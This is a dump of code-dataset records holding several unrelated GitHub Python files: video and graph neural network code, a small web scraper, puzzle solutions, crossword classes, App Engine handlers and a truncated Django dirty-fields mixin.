{"seq_id":"653886086","text":"from util.util import add_dummy_to_tensor\nimport torch.utils.data as data\nimport torch\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport numpy as np\nimport random\n\nclass BaseDataset(data.Dataset):\n    def __init__(self):\n        super(BaseDataset, self).__init__()\n\n    def name(self):\n        return 'BaseDataset'\n\n    def initialize(self, opt):\n        pass\n\n    def update_training_batch(self, ratio): # update the training sequence length to be longer \n        seq_len_max = min(128, self.seq_len_max) - (self.opt.n_frames_G - 1)\n        if self.n_frames_total < seq_len_max:\n            self.n_frames_total = min(seq_len_max, self.opt.n_frames_total * (2**ratio))\n            #self.n_frames_total = min(seq_len_max, self.opt.n_frames_total * (ratio + 1))\n            print('--------- Updating training sequence length to %d ---------' % self.n_frames_total)\n\n    def init_frame_idx(self, A_paths):\n        self.n_of_seqs = min(len(A_paths), self.opt.max_dataset_size) # number of sequences to train\n        self.seq_len_max = max([len(A) for A in A_paths]) # max number of frames in the training sequences\n\n        self.seq_idx = 0 # index for current sequence\n        self.frame_idx = self.opt.start_frame if not self.opt.isTrain else 0 # index for current frame in the sequence\n        self.frames_count = [] # number of frames in each sequence\n        for path in A_paths:\n            self.frames_count.append(len(path) - self.opt.n_frames_G + 1)\n\n        self.folder_prob = [count / sum(self.frames_count) for count in self.frames_count]\n        self.n_frames_total = self.opt.n_frames_total if self.opt.isTrain else 1 \n        self.A, self.B, self.I = None, None, None\n\n    def update_frame_idx(self, A_paths, index):\n        if self.opt.isTrain:\n            if self.opt.dataset_mode == 'pose': \n                seq_idx = np.random.choice(len(A_paths), p=self.folder_prob) # randomly pick sequence to train\n                self.frame_idx = index\n            
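# non-pose datasets simply cycle through the sequences in order\n            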
else: \n seq_idx = index % self.n_of_seqs \n return None, None, None, seq_idx\n else:\n self.change_seq = self.frame_idx >= self.frames_count[self.seq_idx]\n if self.change_seq:\n self.seq_idx += 1\n self.frame_idx = 0\n self.A, self.B, self.I = None, None, None\n return self.A, self.B, self.I, self.seq_idx\n\n def init_data_params(self, data, n_gpus, tG):\n opt = self.opt\n _, n_frames_total, self.height, self.width = data['B'].size() # n_frames_total = n_frames_load * n_loadings + tG - 1 \n n_frames_total = n_frames_total // opt.output_nc\n n_frames_load = opt.max_frames_per_gpu * n_gpus # number of total frames loaded into GPU at a time for each batch\n n_frames_load = min(n_frames_load, n_frames_total - tG + 1)\n self.t_len = n_frames_load + tG - 1 # number of loaded frames plus previous frames\n return n_frames_total-self.t_len+1, n_frames_load, self.t_len\n\n def init_data(self, t_scales):\n fake_B_last = None # the last generated frame from previous training batch (which becomes input to the next batch)\n real_B_all, fake_B_all, flow_ref_all, conf_ref_all = None, None, None, None # all real/generated frames so far\n if self.opt.sparse_D:\n real_B_all, fake_B_all, flow_ref_all, conf_ref_all = [None]*t_scales, [None]*t_scales, [None]*t_scales, [None]*t_scales\n \n frames_all = real_B_all, fake_B_all, flow_ref_all, conf_ref_all \n return fake_B_last, frames_all\n\n def prepare_data(self, data, i, input_nc, output_nc):\n t_len, height, width = self.t_len, self.height, self.width\n # 5D tensor: batchSize, # of frames, # of channels, height, width\n input_A = (data['A'][:, i*input_nc:(i+t_len)*input_nc, ...]).view(-1, t_len, input_nc, height, width)\n input_B = (data['B'][:, i*output_nc:(i+t_len)*output_nc, ...]).view(-1, t_len, output_nc, height, width) \n inst_A = (data['inst'][:, i:i+t_len, ...]).view(-1, t_len, 1, height, width) if len(data['inst'].size()) > 2 else None\n return [input_A, input_B, inst_A]\n\ndef make_power_2(n, base=32.0): \n return int(round(n / base) * base)\n\ndef get_img_params(opt, size):\n w, h = size\n new_h, new_w = h, w \n if 'resize' in opt.resize_or_crop: # resize image to be loadSize x loadSize\n new_h = new_w = opt.loadSize \n elif 'scaleWidth' in opt.resize_or_crop: # scale image width to be loadSize\n new_w = opt.loadSize\n new_h = opt.loadSize * h // w\n elif 'scaleHeight' in opt.resize_or_crop: # scale image height to be loadSize\n new_h = opt.loadSize\n new_w = opt.loadSize * w // h\n elif 'randomScaleWidth' in opt.resize_or_crop: # randomly scale image width to be somewhere between loadSize and fineSize\n new_w = random.randint(opt.fineSize, opt.loadSize + 1)\n new_h = new_w * h // w\n elif 'randomScaleHeight' in opt.resize_or_crop: # randomly scale image height to be somewhere between loadSize and fineSize\n new_h = random.randint(opt.fineSize, opt.loadSize + 1)\n new_w = new_h * w // h\n new_w = int(round(new_w / 4)) * 4\n new_h = int(round(new_h / 4)) * 4 \n\n crop_x = crop_y = 0\n crop_w = crop_h = 0\n if 'crop' in opt.resize_or_crop or 'scaledCrop' in opt.resize_or_crop:\n if 'crop' in opt.resize_or_crop: # crop patches of size fineSize x fineSize\n crop_w = crop_h = opt.fineSize\n else:\n if 'Width' in opt.resize_or_crop: # crop patches of width fineSize\n crop_w = opt.fineSize\n crop_h = opt.fineSize * h // w\n else: # crop patches of height fineSize\n crop_h = opt.fineSize\n crop_w = opt.fineSize * w // h\n\n crop_w, crop_h = make_power_2(crop_w), make_power_2(crop_h) \n x_span = (new_w - crop_w) // 2\n crop_x = np.maximum(0, 
np.minimum(x_span*2, int(np.random.randn() * x_span/3 + x_span))) \n crop_y = random.randint(0, np.minimum(np.maximum(0, new_h - crop_h), new_h // 8))\n #crop_x = random.randint(0, np.maximum(0, new_w - crop_w))\n #crop_y = random.randint(0, np.maximum(0, new_h - crop_h)) \n else:\n new_w, new_h = make_power_2(new_w), make_power_2(new_h)\n\n flip = (random.random() > 0.5) and (opt.dataset_mode != 'pose')\n return {'new_size': (new_w, new_h), 'crop_size': (crop_w, crop_h), 'crop_pos': (crop_x, crop_y), 'flip': flip}\n\ndef get_transform(opt, params, method=Image.BICUBIC, normalize=True, toTensor=True):\n transform_list = []\n ### resize input image\n if 'resize' in opt.resize_or_crop:\n osize = [opt.loadSize, opt.loadSize]\n transform_list.append(transforms.Scale(osize, method)) \n else:\n transform_list.append(transforms.Lambda(lambda img: __scale_image(img, params['new_size'], method)))\n \n ### crop patches from image\n if 'crop' in opt.resize_or_crop or 'scaledCrop' in opt.resize_or_crop:\n transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_size'], params['crop_pos']))) \n\n ### random flip\n if opt.isTrain and not opt.no_flip:\n transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))\n\n if toTensor:\n transform_list += [transforms.ToTensor()]\n if normalize:\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\ndef toTensor_normalize(): \n transform_list = [transforms.ToTensor()] \n transform_list += [transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\ndef __scale_image(img, size, method=Image.BICUBIC):\n w, h = size \n return img.resize((w, h), method)\n\ndef __crop(img, size, pos):\n ow, oh = img.size\n tw, th = size\n x1, y1 = pos \n if (ow > tw or oh > th): \n return img.crop((x1, y1, min(ow, x1 + tw), min(oh, y1 + th)))\n return img\n\ndef __flip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\n\ndef get_video_params(opt, n_frames_total, cur_seq_len, index):\n tG = opt.n_frames_G\n if opt.isTrain: \n n_frames_total = min(n_frames_total, cur_seq_len - tG + 1)\n\n n_gpus = opt.n_gpus_gen if opt.batchSize == 1 else 1 # number of generator GPUs for each batch\n n_frames_per_load = opt.max_frames_per_gpu * n_gpus # number of frames to load into GPUs at one time (for each batch)\n n_frames_per_load = min(n_frames_total, n_frames_per_load)\n n_loadings = n_frames_total // n_frames_per_load # how many times are needed to load entire sequence into GPUs \n n_frames_total = n_frames_per_load * n_loadings + tG - 1 # rounded overall number of frames to read from the sequence\n \n max_t_step = min(opt.max_t_step, (cur_seq_len-1) // (n_frames_total-1))\n t_step = np.random.randint(max_t_step) + 1 # spacing between neighboring sampled frames\n offset_max = max(1, cur_seq_len - (n_frames_total-1)*t_step) # maximum possible index for the first frame \n if opt.dataset_mode == 'pose':\n start_idx = index % offset_max\n else:\n start_idx = np.random.randint(offset_max) # offset for the first frame to load\n if opt.debug:\n print(\"loading %d frames in total, first frame starting at index %d, space between neighboring frames is %d\"\n % (n_frames_total, start_idx, t_step))\n else:\n n_frames_total = tG\n start_idx = index\n t_step = 1 \n return n_frames_total, start_idx, t_step\n\ndef concat_frame(A, Ai, nF):\n if A is None:\n A = Ai\n else:\n c = Ai.size()[0]\n if A.size()[0] == nF * c:\n A = 
A[c:]\n        A = torch.cat([A, Ai])\n    return A","repo_name":"NVIDIA/vid2vid","sub_path":"data/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":10368,"program_lang":"python","lang":"en","doc_type":"code","stars":8394,"dataset":"github-code","pt":"37"} +{"seq_id":"22723880726","text":"from selenium import webdriver\n#instantiate a browser driver\nchrome = webdriver.Chrome()\n#open the page\nchrome.get(\"http://book.zongheng.com/chapter/837093/55277727.html\")\n#capture the elements\ntexts = chrome.find_elements_by_xpath(\"//div[@class='content']/p\")\n#write the content into a txt file\nfor t in texts:\n    with open(\"xiaoshuo.txt\",\"a\") as f:\n        f.write(t.text)\n#close the browser\nchrome.close()\n\n","repo_name":"GuoKangPython/zidonghua","sub_path":"Xpath.py","file_name":"Xpath.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72780701226","text":"import torch\nimport torch_geometric.nn as pyg_nn\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pad_sequence \nfrom torch_geometric.data import Data, Batch\nfrom torch_geometric.utils import to_dense_batch\n\nimport pytorch_lightning as pl\nimport torchmetrics\n\nfrom gnn_convs import build_conv_model\n\nclass SimGNN(pl.LightningModule):\n    def __init__(self,gnn_layers, input_dim, hidden_dim, tensor_neurons, bottle_neck_neurons, histogram = False, bins = 10, dropout=0.5, conv_type = \"GIN\", \\\n        lr = 0.001):\n        \"\"\"\n        \"\"\"\n        super(SimGNN, self).__init__()\n\n        self.input_dim = input_dim\n        self.tensor_neurons = tensor_neurons\n        self.dropout = dropout\n        self.gnn_layers = gnn_layers\n        self.bottle_neck_neurons = bottle_neck_neurons\n        self.histogram = histogram\n        self.bins = bins\n        self.conv_type = conv_type\n        self.lr = lr\n\n        self.mse_loss = torchmetrics.MeanSquaredError()\n        self.train_acc = torchmetrics.Accuracy(num_classes=2)\n        self.val_acc = torchmetrics.Accuracy(num_classes=2)\n\n        #Conv layers\n        if not isinstance(hidden_dim, list):\n            hidden_dim = [hidden_dim]*gnn_layers\n        self.hidden_dim = hidden_dim\n        assert(gnn_layers == len(hidden_dim))\n\n        conv_model = build_conv_model(self.conv_type, 1)\n        self.convs = torch.nn.ModuleList()\n        for dim in hidden_dim:\n            self.convs.append(conv_model(input_dim, dim))\n            input_dim = dim\n        \n        #Attention\n        self.attention_layer = torch.nn.Linear(self.hidden_dim[-1], self.hidden_dim[-1], bias=False)\n        torch.nn.init.xavier_uniform_(self.attention_layer.weight)\n        #NTN\n        self.ntn_a = torch.nn.Bilinear(self.hidden_dim[-1], self.hidden_dim[-1], tensor_neurons, bias=False)\n        torch.nn.init.xavier_uniform_(self.ntn_a.weight)\n        self.ntn_b = torch.nn.Linear(2*self.hidden_dim[-1], tensor_neurons, bias=False)\n        torch.nn.init.xavier_uniform_(self.ntn_b.weight)\n        self.ntn_bias = torch.nn.Parameter(torch.Tensor(tensor_neurons,1))\n        torch.nn.init.xavier_uniform_(self.ntn_bias)\n        #Final FC\n        feature_count = (tensor_neurons+self.bins) if self.histogram else self.tensor_neurons\n        self.fc1 = torch.nn.Linear(feature_count, self.bottle_neck_neurons)\n        self.fc2 = torch.nn.Linear(self.bottle_neck_neurons, 1)\n\n    def GNN (self, data):\n        \"\"\"\n        \"\"\"\n        x, edge_index = data.x, data.edge_index\n        for i in range(self.gnn_layers-1):\n            x = F.relu(self.convs[i](x, edge_index))\n            x = F.dropout(x, p=self.dropout)\n        x = self.convs[-1](x, edge_index)\n\n        return x\n\n    def forward(self, data_pair):\n        \"\"\"\n        batch_adj is unused\n        \"\"\"\n        c_graphs = data_pair.target_data()\n        q_graphs = data_pair.subgraph_data()\n        #q_graphs,c_graphs = zip(*batch_data)\n        
#a,b = zip(*batch_data_sizes)\n #qgraph_sizes = cudavar(self.av,torch.tensor(a))\n #cgraph_sizes = cudavar(self.av,torch.tensor(b))\n #query_batch = Batch.from_data_list(q_graphs)\n q_graphs_x = self.GNN(q_graphs)\n q, _ = to_dense_batch(q_graphs_x, q_graphs.batch)\n #query_gnode_embeds = [g.x for g in q_graphs.to_data_list()]\n #query_gnode_embeds = []\n #for i in torch.unique(q_graphs.batch):\n # query_gnode_embeds.append(q_graphs.x[q_graphs.batch == i])\n #qgraph_sizes = torch.tensor([g.size(0) for g in query_gnode_embeds])\n #q = pad_sequence(query_gnode_embeds,batch_first=True)\n c_graphs_x = self.GNN(c_graphs)\n \n c, _ = to_dense_batch(c_graphs_x, c_graphs.batch)\n #print(\"c: \", c)\n #corpus_gnode_embeds = [g.x for g in c_graphs.to_data_list()]\n #context = torch.tanh(torch.div(torch.sum(self.attention_layer(q),dim=1).T,qgraph_sizes).T)\n context = torch.tanh(pyg_nn.global_mean_pool(self.attention_layer(q_graphs_x), q_graphs.batch))\n #print(\"context: \", context)\n sigmoid_scores = torch.sigmoid(q @ context.unsqueeze(2))\n e1 = (q.permute(0,2,1)@sigmoid_scores).squeeze()\n #print(\"e1: \", e1)\n #c = pad_sequence(corpus_gnode_embeds,batch_first=True)\n context = torch.tanh(pyg_nn.global_mean_pool(self.attention_layer(c_graphs_x), c_graphs.batch))\n sigmoid_scores = torch.sigmoid(c @ context.unsqueeze(2))\n e2 = (c.permute(0,2,1)@sigmoid_scores).squeeze()\n \n scores = torch.nn.functional.relu(self.ntn_a(e1,e2) +self.ntn_b(torch.cat((e1,e2),dim=-1))+self.ntn_bias.squeeze())\n #print(\"SCORES: \", scores)\n #TODO: Figure out how to tensorize this\n if self.histogram == True:\n h = torch.histc(q@c.permute(0,2,1),bins=self.bins)\n h = h/torch.sum(h)\n\n scores = torch.cat((scores, h),dim=1)\n \n preds = []\n scores = torch.nn.functional.relu(self.fc1(scores))\n score = torch.sigmoid(self.fc2(scores))\n #preds.append(score)\n #p = torch.stack(preds).squeeze()\n return score#p\n\n def training_step(self, batch, batch_idx):\n\n out = self(batch)\n \n loss = F.mse_loss(out.squeeze(), batch.y.float())\n\n pred = (out>0.5).squeeze(1)\n\n self.log(\"train_loss\", loss)\n self.log(\"train acc\", self.train_acc(pred, batch.y))\n return loss\n \n def training_epoch_end(self, out):\n self.log(\"total train acc\", self.train_acc.compute(), prog_bar=True)\n self.train_acc.reset()\n\n def validation_step(self, batch, batch_idx):\n out = self(batch)\n pred = (out>0.5)\n self.log(\"val acc\", self.val_acc(pred.squeeze(), batch.y))\n \n def validation_epoch_end(self, out):\n self.log(\"total val acc\", self.val_acc.compute(), prog_bar=True)\n self.val_acc.reset()\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(self.parameters(), lr=self.lr)\n return opt","repo_name":"XuanzhouLiu/End2End-Subgraph-Matching","sub_path":"graphsim.py","file_name":"graphsim.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22913089950","text":"import sys\nimport notiflib\nwith open('inputday1.txt','r') as input:\n x = input.readlines()\n print(x)\nfinishnum = 0\ny = 0\nmylist = []\ndone = False\nwhile done == False:\n y=0\n for y in range(0,len(x)):\n z=str(x[y])[:len(x[y])-1]\n if z[0] == '-':\n \n z=int(z[0:])\n finishnum = finishnum + z\n \n else:\n print(z)\n z = int(z[0:])\n \n finishnum = finishnum + z\n if finishnum in mylist:\n print(finishnum)\n sys.exit()\n quit()\n else:\n mylist.append(finishnum)\n #print(z)\n 
#print(finishnum,'\\n')\n\nprint(finishnum)","repo_name":"shoryamalani/advent_of_code_2018","sub_path":"day1/Day1Challenge2.py","file_name":"Day1Challenge2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71581967786","text":"# -*- coding: utf-8 -*-\n\"\"\"Classes for working with cryptic crosswords.\"\"\"\nimport collections\nimport os\n\nfrom crossword import Crossword\nfrom crossword.core import CrosswordCell\nfrom crossword.core import CrosswordDirectionClues as CrypticCluesContainer\nfrom crossword.core import CrosswordMetadata\n\n\nclass CrypticClues(collections.OrderedDict):\n    \"\"\"An object that contains the clues for a cryptic crossword.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize a new crossword puzzle clues object.\"\"\"\n        super(CrypticClues, self).__init__(*args, **kwargs)\n        # TODO: Decide how to initialize a new clues object.\n\n    def __getattr__(self, name):\n        \"\"\"Access dict items as attributes.\"\"\"\n        try:\n            return self[name]\n        except KeyError:\n            raise AttributeError\n\n    def all(self, sort=int):\n        \"\"\"Return a generator of all clues.\"\"\"\n        for title in self:\n            for number, clue in self[title](sort=sort):\n                yield title, number, clue\n\n\nclass CrypticCrossword(Crossword):\n    \"\"\"A cryptic crossword puzzle.\"\"\"\n\n    HEX = \"hex\"\n\n    def __init__(self, width=15, height=15):\n        \"\"\"Initialize a new crossword puzzle object.\"\"\"\n        if width <= 0:\n            raise ValueError(\"Width needs to be at least one\")\n        if height <= 0:\n            raise ValueError(\"Height needs to be at least one\")\n\n        # set the dimensions of the grid\n        self.width = width\n        self.height = height\n\n        # create a two-dimensional array of crossword cells\n        self._data = [\n            [CrosswordCell() for _ in range(width)] for _ in range(height)\n        ]\n\n        # create the metadata and clues objects\n        self.meta = CrosswordMetadata()\n        self.clues = CrypticClues()\n\n        # file format-specific identifier and data\n        self._format_identifier = None\n        self._format = {}\n\n        # override the default block (\"#\") and empty (\"_\") characters\n        self.block = None\n        self.empty = None\n\n        # add attributes for solution and words\n        self.solution = None\n        self.words = {}\n\n    @property\n    def content(self):\n        \"\"\"Return a dict with the content of the puzzle.\"\"\"\n        return {\n            'width': self.width,\n            'height': self.height,\n            'cells': self._data,\n            'metadata': self.meta,\n            'clues': {title: self.clues[title] for title in self.clues},\n            'block': self.block,\n            'empty': self.empty,\n            'type': self._format_identifier,\n            'format': self._format,\n        }\n\n    def __str__(self):\n        \"\"\"Return the string representation of a puzzle.\"\"\"\n        result = []\n        for row in self:\n            for cell in row:\n                value = None\n                if cell.get(\"block\"):\n                    value = \"#\"\n                if cell.get(\"empty\"):\n                    value = \"_\"\n                if cell.get(\"entry\"):\n                    value = cell.get(\"entry\")\n                if not value:\n                    value = \"_\"\n                result.append(value)\n            result.append(str(os.linesep))\n        return str('').join(result)\n","repo_name":"lukwam/variety","sub_path":"cryptic/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15307174132","text":"import torch\nimport pandas\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\n\n\"\"\"\nHuman Activity neural network implementation (Non-quantization aware training)\n\"\"\"\n\nclass HARnn(torch.nn.Module):\n    
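# Architecture sketch (comment added for clarity): a plain fully-connected\n    # classifier mapping the 560 accelerometer features through\n    # 800 -> 400 -> 200 -> 100 -> 50 hidden units to 6 activity classes,\n    # with ReLU between layers and a log-softmax output (see forward() below).\n    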
def __init__(self):\n        super(HARnn, self).__init__()\n        self.linear1 = torch.nn.Linear(560, 800)\n        self.linear2 = torch.nn.Linear(800, 400)\n        self.linear3 = torch.nn.Linear(400, 200)\n        self.linear4 = torch.nn.Linear(200, 100)\n        self.linear5 = torch.nn.Linear(100, 50)\n        self.linear6 = torch.nn.Linear(50, 6)\n\n    def forward(self, x):\n        x = F.relu(self.linear1(x))\n        x = F.relu(self.linear2(x))\n        x = F.relu(self.linear3(x))\n        x = F.relu(self.linear4(x))\n        x = F.relu(self.linear5(x))\n        x = F.log_softmax(self.linear6(x), dim=1)\n        return x\n\ntrain_frame = pandas.read_csv('train.csv')\naccelerometer_data = train_frame.iloc[1:, 1:561]\nvalues = train_frame.iloc[1:, 562]\n\nlabels = {\n    \"STANDING\": torch.tensor([0]),\n    \"SITTING\": torch.tensor([1]),\n    \"LAYING\": torch.tensor([2]),\n    \"WALKING\": torch.tensor([3]),\n    \"WALKING_DOWNSTAIRS\": torch.tensor([4]),\n    \"WALKING_UPSTAIRS\": torch.tensor([5])\n}\n\ndef predict(model, prev_accuracy):\n    test_frame = pandas.read_csv('test.csv')\n    test_accelerometer_data = test_frame.iloc[1:, 1:561]\n    test_values = test_frame.iloc[1:, 562]\n    correct_pred = 0\n\n    for x in range(len(test_values)):\n        data = torch.tensor([test_accelerometer_data.iloc[x]])\n        data.requires_grad = True\n        result_tensor = model(data)\n        pred = np.argmax(result_tensor.data.numpy())\n        if (labels[test_values.iloc[x]][0] == pred):\n            correct_pred += 1\n\n    accuracy = 100. * correct_pred / len(test_values)\n    print('Accuracy: {}'.format(accuracy))\n    if (accuracy > prev_accuracy):\n        torch.save(model.state_dict(), './HARNN_MODEL')\n\n    return accuracy\n#Hard-coded parameters\nepochs = 50\nlearning_rate = 0.01\naccuracy = 0\n# Construct our model by instantiating the class defined above.\nmodel = HARnn()\nloss_fn = torch.nn.CrossEntropyLoss()\n\noptimizer = torch.optim.SGD(model.parameters(), lr = learning_rate)\nfor epoch in range(epochs):\n    # Forward pass: Compute predicted y by passing x to the model\n    for x in range(len(values)):\n        data = torch.tensor([accelerometer_data.iloc[x]])\n        data.requires_grad = True\n        target = labels[values.iloc[x]]\n        pred = model(data)\n        loss = loss_fn(pred, target)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n        if x % 2000 == 0 and x:\n            print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(epoch, x, len(values), x / len(values) * 100., loss.data))\n\n    accuracy = predict(model, accuracy)\n","repo_name":"CoderStellaJ/CG4002-Capstone-Project","sub_path":"Hw2_fpga/har_nn.py","file_name":"har_nn.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8449266768","text":"#!/usr/bin/env python\n\nimport os\nimport json\nfrom functools import update_wrapper\nfrom datetime import datetime, timedelta\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom chinwag import models\n\n_DEBUG = True\n\ndef online_users(room):\n    \"\"\"returns a list of all the online users\"\"\"\n    threshold = datetime.now() - timedelta(seconds=10)\n    authorizations = models.Authorization.gql(\"WHERE room = :room AND last_checked_in >= :threshold\", room=room, threshold=threshold).fetch(1000)\n    return [x.user for x in authorizations]\n\ndef login_required(f):\n    def _f(self, *a, **kw):\n        user = users.get_current_user()\n        if not user:\n            self.redirect(users.create_login_url(self.request.url))\n        else:\n            f(self, *a, **kw)\n    return update_wrapper(_f, f)\n    \ndef find_room_and_authorize(f):\n    \"\"\"Used to 
find a room by id. Once found, passes it as room rather than id.\"\"\"\n    def _f(self, id):\n        room = models.Room.get_by_id(int(id))\n        if room and room.is_user_authorized(users.get_current_user()):\n            f(self, room)\n        else:\n            self.error(404)\n    return update_wrapper(_f, f)\n\nclass ApplicationHandler(webapp.RequestHandler):\n    \"\"\"Supplies a common template generation function.\"\"\"\n    def render_template(self, template_path, template_values={}):\n        values = {\n            'request' : self.request,\n            'current_user' : users.get_current_user(),\n            'login_url' : users.create_login_url(self.request.uri),\n            'logout_url' : users.create_logout_url(self.request.uri),\n            'application_name' : 'ChinWag',\n        }\n        values.update(template_values)\n        path = os.path.join(os.path.dirname(__file__), '..', 'views', template_path)\n        self.response.out.write(template.render(path, values, debug=_DEBUG))\n    \n    def render_json(self, obj):\n        \"\"\"Renders an object in json format with proper headers.\"\"\"\n        self.response.content_type = \"application/json\"\n        self.response.out.write(json.dumps(obj))\n    \nclass HomeHandler(ApplicationHandler):\n    \"\"\"Handles the home page.\"\"\"\n    def get(self):\n        self.render_template('home/index.html')\n    \nclass MockHTTPMethodMiddleware(object):\n    \"\"\"Makes it possible to do PUT and DELETE using _method.\"\"\"\n    def __init__(self, app):\n        self.app = app\n\n    def __call__(self, environ, start_response):\n        method = webapp.Request(environ).get('_method')\n        if method:\n            environ['REQUEST_METHOD'] = method.upper()\n        return self.app(environ, start_response)","repo_name":"jnunemaker/chinwag","sub_path":"chinwag/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"16858577992","text":"\"\"\"\nGiven a list of lists, get their Cartesian product\nExample:\nInput:[[1,2],[3,4],[5,6]]\nOutput: [(1, 3, 5), (1, 3, 6), (1, 4, 5), (1, 4, 6), (2, 3, 5), (2, 3, 6), (2, 4, 5), (2, 4, 6)]\n\n\"\"\"\n\ndef cartesian_product(arr_list):\n    if not arr_list:\n        yield ()\n    else:\n        for a in arr_list[0]:\n            for prod in cartesian_product(arr_list[1:]):\n                yield (a,)+prod\n","repo_name":"suyogpotnis/Interview_Questions","sub_path":"Cartesian_Product_List.py","file_name":"Cartesian_Product_List.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1959633602","text":"#!/usr/bin/python\nimport sys\nimport re\nimport datetime\nimport os\n\nminifi_folder=sys.argv[1]\n\nstart_time_obj=datetime.datetime(2021, 3, 5, 2, 8, 39)\nend_time_obj=datetime.datetime(2021, 3, 5, 2, 8, 42)\n\nprint(\"Now processing minifi files for expected count\")\nnum_expected_flowfiles_minifi=0\nif len(os.listdir(minifi_folder)) == 0:\n    print(\"Minifi log files haven't been imported to NiFi node yet\")\n    sys.exit(-1)\n\nfor minifi_log in os.listdir(minifi_folder):\n    with open(os.path.join(minifi_folder, minifi_log), 'r') as fp:\n        line=fp.readline()\n        while line:\n            m=re.search(\"(.*) INFO \\[.*New epoch entering\",line)\n            if m:\n                curr_time=datetime.datetime.strptime(m.group(1),'%Y-%m-%d %H:%M:%S,%f')\n                if (curr_time <= end_time_obj) and (curr_time >= start_time_obj):\n                    num_expected_flowfiles_minifi+=1\n            line=fp.readline()\n\nprint(\"Expected number of flowfiles in pipeline: ", 
num_expected_flowfiles_minifi)\n\n","repo_name":"chopark/CodeDeploy_NiFi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25577962722","text":"from copy import deepcopy\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.files import File\nfrom django.db.models.expressions import BaseExpression\nfrom django.db.models.expressions import Combinable\nfrom django.db.models.signals import post_save, m2m_changed\n\nfrom .compare import raw_compare, compare_states, normalise_value\n\n\ndef get_m2m_with_model(given_model):\n    return [\n        (f, f.model if f.model != given_model else None)\n        for f in given_model._meta.get_fields()\n        if f.many_to_many and not f.auto_created\n    ]\n\n\nclass DirtyFieldsMixin(object):\n    compare_function = (raw_compare, {})\n    normalise_function = (normalise_value, {})\n\n    # This mode has been introduced to handle some situations like this one:\n    # https://github.com/romgar/django-dirtyfields/issues/73\n    ENABLE_M2M_CHECK = False\n\n    FIELDS_TO_CHECK = None\n\n    def __init__(self, *args, **kwargs):\n        super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n        post_save.connect(\n            reset_state, sender=self.__class__, weak=False,\n            dispatch_uid='{name}-DirtyFieldsMixin-sweeper'.format(\n                name=self.__class__.__name__))\n        if self.ENABLE_M2M_CHECK:\n            self._connect_m2m_relations()\n        reset_state(sender=self.__class__, instance=self)\n\n    def refresh_from_db(self, using=None, fields=None):\n        super(DirtyFieldsMixin, self).refresh_from_db(using=using, fields=fields)\n        reset_state(sender=self.__class__, instance=self, update_fields=fields)\n\n    def _connect_m2m_relations(self):\n        for m2m_field, model in get_m2m_with_model(self.__class__):\n            m2m_changed.connect(\n                reset_state, sender=m2m_field.remote_field.through, weak=False,\n                dispatch_uid='{name}-DirtyFieldsMixin-sweeper-m2m'.format(\n                    name=self.__class__.__name__))\n\n    def _as_dict(self, check_relationship, include_primary_key=True):\n        \"\"\"\n        Capture the model fields' state as a dictionary.\n\n        Only capture values we are confident are in the database, or would be\n        saved to the database if self.save() is called.\n        \"\"\"\n        all_field = {}\n\n        deferred_fields = self.get_deferred_fields()\n\n        for field in self._meta.concrete_fields:\n\n            # For backward compatibility reasons, in particular for fkey fields, we check both\n            # the real name and the wrapped name (it means that we can specify either the field\n            # name with or without the \"_id\" suffix).\n            field_names_to_check = [field.name, field.get_attname()]\n            if self.FIELDS_TO_CHECK and (not any(name in self.FIELDS_TO_CHECK for name in field_names_to_check)):\n                continue\n\n            if field.primary_key and not include_primary_key:\n                continue\n\n            if field.remote_field:\n                if not check_relationship:\n                    continue\n\n            if field.get_attname() in deferred_fields:\n                continue\n\n            field_value = getattr(self, field.attname)\n\n            if isinstance(field_value, File):\n                # Uses the name for files due to a performance regression caused by Django 3.1.\n                # For more info see: https://github.com/romgar/django-dirtyfields/issues/165\n                field_value = field_value.name\n\n            # If current field value is an expression, we are not evaluating it\n            if isinstance(field_value, (BaseExpression, Combinable)):\n                continue\n\n            try:\n                # Store the converted value for fields with conversion\n                field_value = field.to_python(field_value)\n            except ValidationError:\n                # The current value is not 
